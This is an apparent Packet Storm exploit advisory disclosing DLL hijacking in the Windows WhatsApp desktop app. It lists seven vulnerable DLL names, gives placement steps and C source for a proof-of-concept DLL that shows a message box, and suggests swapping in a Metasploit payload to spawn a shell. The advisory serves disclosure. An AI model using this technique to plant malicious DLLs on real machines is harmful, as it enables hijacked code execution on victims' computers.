WhatsApp DLL Hijacking

2016-09-09T00:00:00
ID PACKETSTORM:138651
Type packetstorm
Reporter Amir.ght
Modified 2016-09-09T00:00:00

Description

                                        
                                            `# Exploit Title: WhatsApp DLL Hijacking  
# Date: 8-9-2016  
# Author: Ashiyane Digital Security Team  
# Vendor Homepage:https://www.whatsapp.com  
# software link:  
https://web.whatsapp.com/desktop/windows/release/ia32/WhatsAppSetup.exe  
# Tested on:Windows 7  
----------------------------------------------------------------------------------------------------------  
vulnerable DLLs :  
api-ms-win-core-localization-obsolete-l1-2-0.dll  
api-ms-win-core-datetime-l1-1-1.dll  
ext-ms-win-kernel32-package-current-l1-1-0.dll  
api-ms-win-appmodel-runtime-l1-1-1.dll  
api-ms-win-core-localization-l1-2-1.dll  
api-ms-win-core-fibers-l1-1-1.dll  
api-ms-win-core-synch-l1-2-0.dll  
  
If an attacker can place the malicious dll with any names of above  
series in same location  
with WhatsApp.exe where victim open WhatsApp.exe it will load and run  
the attackers DLL  
and code.  
also can generate a msfpayload DLL and spawn a shell, for example.  
important: on windows 8.1 not tested  
----------------------------------------------------------------------------------------------------------  
# Exploit:  
1- Save and compile below C code to create vuln DLL  
  
2- Place vuln DLL on Same Directory of WhatsApp.exe  
  
3- Open WhatsApp.exe  
  
//gcc test.c -o shcore.dll -shared  
//this dll show a message box  
#include <windows.h>  
#define DllExport __declspec (dllexport)  
  
BOOL WINAPI DllMain (  
HANDLE hinstDLL,  
DWORD fdwReason,  
LPVOID lpvReserved)  
{  
dll_hijack();  
return 0;  
}  
  
int dll_hijack()  
{  
MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK);  
return 0;  
}  
#################  
Discovered By : Amir.ght  
#################  
  
`